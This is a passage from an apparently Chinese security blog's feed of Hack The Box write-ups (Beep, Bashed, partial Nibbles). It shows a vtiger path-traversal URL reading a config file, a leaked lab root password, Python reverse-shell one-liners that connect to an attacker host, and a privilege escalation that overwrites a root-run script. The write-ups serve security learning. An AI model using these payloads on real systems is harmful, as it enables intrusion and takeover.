loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>直接可以找到给出关键的文件&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/beep/image/image__sqtqTuuHQ_hub2f6e29ad973805849bd690060c8300d_45270_af84b86c52fdf2b13bc6fc91d5de5c34.webp 400w,
/post/hackbox/beep/image/image__sqtqTuuHQ_hub2f6e29ad973805849bd690060c8300d_45270_d9a972c428d6b176254d8aa12f1a3f1d.webp 760w,
/post/hackbox/beep/image/image__sqtqTuuHQ_hub2f6e29ad973805849bd690060c8300d_45270_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/beep/image/image__sqtqTuuHQ_hub2f6e29ad973805849bd690060c8300d_45270_af84b86c52fdf2b13bc6fc91d5de5c34.webp"
width="1261"
height="314"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>访问URL&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">https://10.10.10.7/vtigercrm/graph.php?current_language&lt;span class="o">=&lt;/span>../../../../../../../..//etc/amportal.conf%00&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">module&lt;/span>&lt;span class="o">=&lt;/span>Accounts&lt;span class="p">&amp;amp;&lt;/span>action
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>直接获取到账号密码&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/beep/image/image_2cc3Jp9vkq_hu186064d02aee0536e258ed5dff8ad21d_129505_02c98f2ac165f9686a5a1533fcaf2297.webp 400w,
/post/hackbox/beep/image/image_2cc3Jp9vkq_hu186064d02aee0536e258ed5dff8ad21d_129505_fa11b86649204c2552c45961731854ca.webp 760w,
/post/hackbox/beep/image/image_2cc3Jp9vkq_hu186064d02aee0536e258ed5dff8ad21d_129505_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/beep/image/image_2cc3Jp9vkq_hu186064d02aee0536e258ed5dff8ad21d_129505_02c98f2ac165f9686a5a1533fcaf2297.webp"
width="1203"
height="643"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>web后台和ssh使用一样的密码&lt;/p>
&lt;p>直接登录ssh，&lt;/p>
&lt;p>root/jEhdIekWmdjE&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/beep/image/image_rZgp9BtBG6_hu0af09f2aaea0669375840aadeb37bfea_33421_b8b0bfbef5416834422f1f478d91c8e6.webp 400w,
/post/hackbox/beep/image/image_rZgp9BtBG6_hu0af09f2aaea0669375840aadeb37bfea_33421_5276e2a92352793d3bdd87fcdf8dbc73.webp 760w,
/post/hackbox/beep/image/image_rZgp9BtBG6_hu0af09f2aaea0669375840aadeb37bfea_33421_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/beep/image/image_rZgp9BtBG6_hu0af09f2aaea0669375840aadeb37bfea_33421_b8b0bfbef5416834422f1f478d91c8e6.webp"
width="766"
height="339"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p></description></item><item><title>Bashed</title><link>https://docs.kaiasec.tk/post/hackbox/bashed/</link><pubDate>Mon, 09 May 2022 12:48:40 +0800</pubDate><guid>https://docs.kaiasec.tk/post/hackbox/bashed/</guid><description>&lt;h3 id="nmap扫描">nmap扫描&lt;/h3>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">sudo nmap -T4 -Pn -A -sV -vv -sS --script&lt;span class="o">=&lt;/span>vuln -p- 10.10.10.68
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>扫描结果，只有80端口开放&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/bashed/image/image_dTmvICQNbd_hu7eb93b0eae18056d549dc5c9427adc6a_108088_fe483426578f3cb934019023e40e9391.webp 400w,
/post/hackbox/bashed/image/image_dTmvICQNbd_hu7eb93b0eae18056d549dc5c9427adc6a_108088_db9f866f341f8a4233229df6774d6ae8.webp 760w,
/post/hackbox/bashed/image/image_dTmvICQNbd_hu7eb93b0eae18056d549dc5c9427adc6a_108088_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/bashed/image/image_dTmvICQNbd_hu7eb93b0eae18056d549dc5c9427adc6a_108088_fe483426578f3cb934019023e40e9391.webp"
width="1371"
height="548"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;h3 id="访问http10101068">访问http://10.10.10.68&lt;/h3>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/bashed/image/image_wHEtAxD5WP_hubb86c5cf9eadac5aeb467da7089638ba_492752_fba5a366f2b249ae8122fc64d45fd6d0.webp 400w,
/post/hackbox/bashed/image/image_wHEtAxD5WP_hubb86c5cf9eadac5aeb467da7089638ba_492752_65534239df33ba4c42949ec414f75c54.webp 760w,
/post/hackbox/bashed/image/image_wHEtAxD5WP_hubb86c5cf9eadac5aeb467da7089638ba_492752_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/bashed/image/image_wHEtAxD5WP_hubb86c5cf9eadac5aeb467da7089638ba_492752_fba5a366f2b249ae8122fc64d45fd6d0.webp"
width="1516"
height="795"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>发现项目地址&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">https://github.com/Arrexel/phpbash
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/bashed/image/image_BDJq8X72aN_huea4e277445a90ccc11b6211bcf248986_108433_f3c7cde3f2824f05c055e66790052adc.webp 400w,
/post/hackbox/bashed/image/image_BDJq8X72aN_huea4e277445a90ccc11b6211bcf248986_108433_347c6aeef1f459cfe5a874d3149f2878.webp 760w,
/post/hackbox/bashed/image/image_BDJq8X72aN_huea4e277445a90ccc11b6211bcf248986_108433_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/bashed/image/image_BDJq8X72aN_huea4e277445a90ccc11b6211bcf248986_108433_f3c7cde3f2824f05c055e66790052adc.webp"
width="1484"
height="645"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/bashed/image/image_BNA9z51BGB_hu738a526727292cbca49bfe81dd56c478_62401_47cb2d78561779184850998920a1d6d1.webp 400w,
/post/hackbox/bashed/image/image_BNA9z51BGB_hu738a526727292cbca49bfe81dd56c478_62401_e611ad0e5208648f3e347ce2caa0b08e.webp 760w,
/post/hackbox/bashed/image/image_BNA9z51BGB_hu738a526727292cbca49bfe81dd56c478_62401_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/bashed/image/image_BNA9z51BGB_hu738a526727292cbca49bfe81dd56c478_62401_47cb2d78561779184850998920a1d6d1.webp"
width="1230"
height="618"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>关键信息，找到这两个文件的路径&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">phpbash.min.php
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">phpbash.php
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>F12看一下源码&lt;/p>
&lt;p>图片路径存在目录遍历，不过没发现敏感信息&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/bashed/image/image_4DZpKJ96nI_hu81fc5cfe2ca099506fb64a8e157c2b58_135856_d99fbc3a6346ed507095c9d09554194d.webp 400w,
/post/hackbox/bashed/image/image_4DZpKJ96nI_hu81fc5cfe2ca099506fb64a8e157c2b58_135856_351e63653beb24df53ded742224c94b3.webp 760w,
/post/hackbox/bashed/image/image_4DZpKJ96nI_hu81fc5cfe2ca099506fb64a8e157c2b58_135856_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/bashed/image/image_4DZpKJ96nI_hu81fc5cfe2ca099506fb64a8e157c2b58_135856_d99fbc3a6346ed507095c9d09554194d.webp"
width="945"
height="672"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;h3 id="扫描web路径">扫描web路径&lt;/h3>
&lt;p>dirb （这个不好用，特别慢）&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/bashed/image/image_mFTTVpqoZS_huec8eabbf366a0be4cad9ece3a9bac872_23004_4cb82ac0f00f5fe8dbe4a89642b21ca0.webp 400w,
/post/hackbox/bashed/image/image_mFTTVpqoZS_huec8eabbf366a0be4cad9ece3a9bac872_23004_570ea4e0eef8e97e45f594f74b1a1c7c.webp 760w,
/post/hackbox/bashed/image/image_mFTTVpqoZS_huec8eabbf366a0be4cad9ece3a9bac872_23004_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/bashed/image/image_mFTTVpqoZS_huec8eabbf366a0be4cad9ece3a9bac872_23004_4cb82ac0f00f5fe8dbe4a89642b21ca0.webp"
width="619"
height="349"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>推荐使用Dirbuster，支持多线程&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/bashed/image/image_MNuwJFOs6v_huf05fbaf809b65af04fde800bbc6ade82_75470_2287763b452046f5f45e03124c3d6310.webp 400w,
/post/hackbox/bashed/image/image_MNuwJFOs6v_huf05fbaf809b65af04fde800bbc6ade82_75470_7004b401ab68582c7a61bb3ffa46523d.webp 760w,
/post/hackbox/bashed/image/image_MNuwJFOs6v_huf05fbaf809b65af04fde800bbc6ade82_75470_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/bashed/image/image_MNuwJFOs6v_huf05fbaf809b65af04fde800bbc6ade82_75470_2287763b452046f5f45e03124c3d6310.webp"
width="954"
height="650"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>发现dev路径，发现关键文件&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/bashed/image/image_VHLzzt_9d8_hu9ce1a5b5b60f23cf6ff19a036e296e22_47634_265b4d31e80a12f31aa4ff804518c733.webp 400w,
/post/hackbox/bashed/image/image_VHLzzt_9d8_hu9ce1a5b5b60f23cf6ff19a036e296e22_47634_62b82656bee90879cc07eb7a59554f1c.webp 760w,
/post/hackbox/bashed/image/image_VHLzzt_9d8_hu9ce1a5b5b60f23cf6ff19a036e296e22_47634_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/bashed/image/image_VHLzzt_9d8_hu9ce1a5b5b60f23cf6ff19a036e296e22_47634_265b4d31e80a12f31aa4ff804518c733.webp"
width="554"
height="326"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>访问，直接获得交互式shell，但是权限较低，后面要提权&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">http://10.10.10.68/dev/phpbash.php
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>先获取一个flag&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/bashed/image/image_xKb5bjgEwF_hu90886296f2beae7f6945cbe1425c4425_102102_4475e400cf3fde6c90d1772ac2a9779f.webp 400w,
/post/hackbox/bashed/image/image_xKb5bjgEwF_hu90886296f2beae7f6945cbe1425c4425_102102_90bc9fa1e7b69ec0aed7913e0e1edd0e.webp 760w,
/post/hackbox/bashed/image/image_xKb5bjgEwF_hu90886296f2beae7f6945cbe1425c4425_102102_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/bashed/image/image_xKb5bjgEwF_hu90886296f2beae7f6945cbe1425c4425_102102_4475e400cf3fde6c90d1772ac2a9779f.webp"
width="705"
height="548"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;h3 id="反弹交互式shell">反弹交互式shell&lt;/h3>
&lt;p>本地监听&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">nc -lvp &lt;span class="m">23333&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">#这里试了下端口号比较小好像会断（6666，7777），不知道什么原因&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>靶机执行&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">python -c &lt;span class="s1">&amp;#39;import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&amp;#34;10.10.14.2&amp;#34;,23333));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([&amp;#34;/bin/sh&amp;#34;,&amp;#34;-i&amp;#34;]);&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/bashed/image/image_IWVHr6uHVk_hua1af91a2f5874a862b9f210ce6004f66_14697_189b3627f4dafca39123f45ba18168ef.webp 400w,
/post/hackbox/bashed/image/image_IWVHr6uHVk_hua1af91a2f5874a862b9f210ce6004f66_14697_d34e33754506a1130bd938b09df23c14.webp 760w,
/post/hackbox/bashed/image/image_IWVHr6uHVk_hua1af91a2f5874a862b9f210ce6004f66_14697_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/bashed/image/image_IWVHr6uHVk_hua1af91a2f5874a862b9f210ce6004f66_14697_189b3627f4dafca39123f45ba18168ef.webp"
width="679"
height="154"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;h3 id="提权">提权&lt;/h3>
&lt;p>下载linux提权检测脚本到本地&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS/builder
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;h3 id="本地监听80靶机下载提权文件检测脚本">本地监听80，靶机下载提权文件检测脚本&lt;/h3>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">wget -P /tmp http://10.10.14.2/linpeas.sh
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">chmod &lt;span class="m">777&lt;/span> linpeas.sh
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">./linpeas.sh
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/bashed/image/image_YfzQQV9O1Z_hue837f241be13e402e8cb08851527cbb2_46487_0b3511be3ccff8667c511b6b5b742e26.webp 400w,
/post/hackbox/bashed/image/image_YfzQQV9O1Z_hue837f241be13e402e8cb08851527cbb2_46487_e4e53ca7fc1ed3d097fec31e9e3b4d15.webp 760w,
/post/hackbox/bashed/image/image_YfzQQV9O1Z_hue837f241be13e402e8cb08851527cbb2_46487_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/bashed/image/image_YfzQQV9O1Z_hue837f241be13e402e8cb08851527cbb2_46487_0b3511be3ccff8667c511b6b5b742e26.webp"
width="1283"
height="402"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>发现该用户可直接登录&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">scriptmanager❌1001:1001:,,,:/home/scriptmanager:/bin/bash
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">&lt;span class="c1">#执行&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">sudo -u scriptmanager /bin/bash
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">#升级交互式shel&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">python -c &lt;span class="s1">&amp;#39;import pty; pty.spawn(&amp;#34;/bin/bash&amp;#34;)&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/bashed/image/image_9Ja34vGpgQ_hu4de30f411c7e27451e4c32e92652b3ef_13808_7cccd8297108ea99d436a0fb7407e7e7.webp 400w,
/post/hackbox/bashed/image/image_9Ja34vGpgQ_hu4de30f411c7e27451e4c32e92652b3ef_13808_0da40e10c77032771311ea2d62f2d4bb.webp 760w,
/post/hackbox/bashed/image/image_9Ja34vGpgQ_hu4de30f411c7e27451e4c32e92652b3ef_13808_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/bashed/image/image_9Ja34vGpgQ_hu4de30f411c7e27451e4c32e92652b3ef_13808_7cccd8297108ea99d436a0fb7407e7e7.webp"
width="830"
height="137"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>再执行一下提权检测脚本&lt;/p>
&lt;p>检测到这个py文件当前用户拥有读写权限。&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">/scripts/test.py
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/bashed/image/image_WPQVjwr-Gm_hu2dcd080473e0d5e7d3a704572b79ab96_49015_60a8e255ed91d2d923941836c67c81b2.webp 400w,
/post/hackbox/bashed/image/image_WPQVjwr-Gm_hu2dcd080473e0d5e7d3a704572b79ab96_49015_d318c84514712109fa5edf8466a58812.webp 760w,
/post/hackbox/bashed/image/image_WPQVjwr-Gm_hu2dcd080473e0d5e7d3a704572b79ab96_49015_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/bashed/image/image_WPQVjwr-Gm_hu2dcd080473e0d5e7d3a704572b79ab96_49015_60a8e255ed91d2d923941836c67c81b2.webp"
width="1085"
height="485"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;h3 id="使用pspy监听一下进程的执行情况">使用pspy监听一下进程的执行情况&lt;/h3>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">https://github.com/DominicBreuker/pspy
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">wget -P /tmp/ http://10.10.14.2/pspy32
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">chmod &lt;span class="m">777&lt;/span> pspy32
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">./pspy32
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/bashed/image/image_EL_12YqiSd_hu7e6147f1f66ba6ebd6c9bbdee92fb631_33108_eebbf362882ceba4c0a0eb8ff5db526f.webp 400w,
/post/hackbox/bashed/image/image_EL_12YqiSd_hu7e6147f1f66ba6ebd6c9bbdee92fb631_33108_9eb561b149a2cdf09a85210d98fc24f9.webp 760w,
/post/hackbox/bashed/image/image_EL_12YqiSd_hu7e6147f1f66ba6ebd6c9bbdee92fb631_33108_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/bashed/image/image_EL_12YqiSd_hu7e6147f1f66ba6ebd6c9bbdee92fb631_33108_eebbf362882ceba4c0a0eb8ff5db526f.webp"
width="977"
height="345"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>发现test.py是root(uid=0)在执行，同时当前用户可以读写test.py&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/bashed/image/image_XyUgr5oLAx_hu7eb18b0dccb6df233cb949f1d9a58161_10652_cd83103ac01aff30bec9bfa56898f317.webp 400w,
/post/hackbox/bashed/image/image_XyUgr5oLAx_hu7eb18b0dccb6df233cb949f1d9a58161_10652_7a3515a799ad4785a531f0dd954af226.webp 760w,
/post/hackbox/bashed/image/image_XyUgr5oLAx_hu7eb18b0dccb6df233cb949f1d9a58161_10652_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/bashed/image/image_XyUgr5oLAx_hu7eb18b0dccb6df233cb949f1d9a58161_10652_cd83103ac01aff30bec9bfa56898f317.webp"
width="657"
height="86"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>直接改写test.py内容为反弹shell，root执行test.py时就会把root权限的shell反弹回来。&lt;/p>
&lt;p>本地监听另外一个端口&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/bashed/image/image_fQBN9yCMXt_hu6f64d7b274bfa851944000d14eb20bb2_5099_9a8e230d77728ddb049af60fd09ca71d.webp 400w,
/post/hackbox/bashed/image/image_fQBN9yCMXt_hu6f64d7b274bfa851944000d14eb20bb2_5099_d3629812931ef0e9704c689d67678bca.webp 760w,
/post/hackbox/bashed/image/image_fQBN9yCMXt_hu6f64d7b274bfa851944000d14eb20bb2_5099_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/bashed/image/image_fQBN9yCMXt_hu6f64d7b274bfa851944000d14eb20bb2_5099_9a8e230d77728ddb049af60fd09ca71d.webp"
width="416"
height="74"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;h3 id="改写testpy">改写test.py&lt;/h3>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">&lt;span class="nb">echo&lt;/span> &lt;span class="s1">&amp;#39;import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&amp;#34;10.10.14.2&amp;#34;,23334));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([&amp;#34;/bin/sh&amp;#34;,&amp;#34;-i&amp;#34;]);&amp;#39;&lt;/span>&amp;gt;/scripts/test.py
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;h3 id="等待一分钟获得root权限shell">等待一分钟获得root权限shell&lt;/h3>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/bashed/image/image_fXeCmvNEIj_hu18d8f5a4945c31605049c7eecb7897ad_20365_e9a568101387734e5840c0deba80c42c.webp 400w,
/post/hackbox/bashed/image/image_fXeCmvNEIj_hu18d8f5a4945c31605049c7eecb7897ad_20365_b16a7972951f8abe691d54d0adf29a13.webp 760w,
/post/hackbox/bashed/image/image_fXeCmvNEIj_hu18d8f5a4945c31605049c7eecb7897ad_20365_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/bashed/image/image_fXeCmvNEIj_hu18d8f5a4945c31605049c7eecb7897ad_20365_e9a568101387734e5840c0deba80c42c.webp"
width="559"
height="189"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p></description></item><item><title>Nibbles</title><link>https://docs.kaiasec.tk/post/hackbox/nibbles/</link><pubDate>Sat, 07 May 2022 14:53:40 +0800</pubDate><guid>https://docs.kaiasec.tk/post/hackbox/nibbles/</guid><description>&lt;p>nmap&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">sudo nmap -T4 -Pn -n -r -p- -vv -sV 10.10.10.75
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/nibbles/image/image_S8fShlklmf_hu85826a11f6cfc8770814086d898f2a77_35774_97c4b523fb78bbd81d109fddb6cf0d7d.webp 400w,
/post/hackbox/nibbles/image/image_S8fShlklmf_hu85826a11f6cfc8770814086d898f2a77_35774_e74cbcc1816568e0a628c3dc064b88d6.webp 760w,
/post/hackbox/nibbles/image/image_S8fShlklmf_hu85826a11f6cfc8770814086d898f2a77_35774_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/nibbles/image/image_S8fShlklmf_hu85826a11f6cfc8770814086d898f2a77_35774_97c4b523fb78bbd81d109fddb6cf0d7d.webp"
width="973"
height="117"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>80端口&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/nibbles/image/image_LRUZ10AG3e_hu7fe1a603a418323451eeb6d9b430b51b_17552_d3133223fa2b4e2234c3b728eeb16234.webp 400w,
/post/hackbox/nibbles/image/image_LRUZ10AG3e_hu7fe1a603a418323451eeb6d9b430b51b_17552_62534abd226a2924573fca5b3c4c3514.webp 760w,
/post/hackbox/nibbles/image/image_LRUZ10AG3e_hu7fe1a603a418323451eeb6d9b430b51b_17552_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/nibbles/image/image_LRUZ10AG3e_hu7fe1a603a418323451eeb6d9b430b51b_17552_d3133223fa2b4e2234c3b728eeb16234.webp"
width="438"
height="234"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>查看源码&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/nibbles/image/image_2-n_AHFanj_hu3d6e1b28669eae8fa19f8ef3f0aca56f_32590_4f7083127504620eaf1f97b70a7ab7bf.webp 400w,
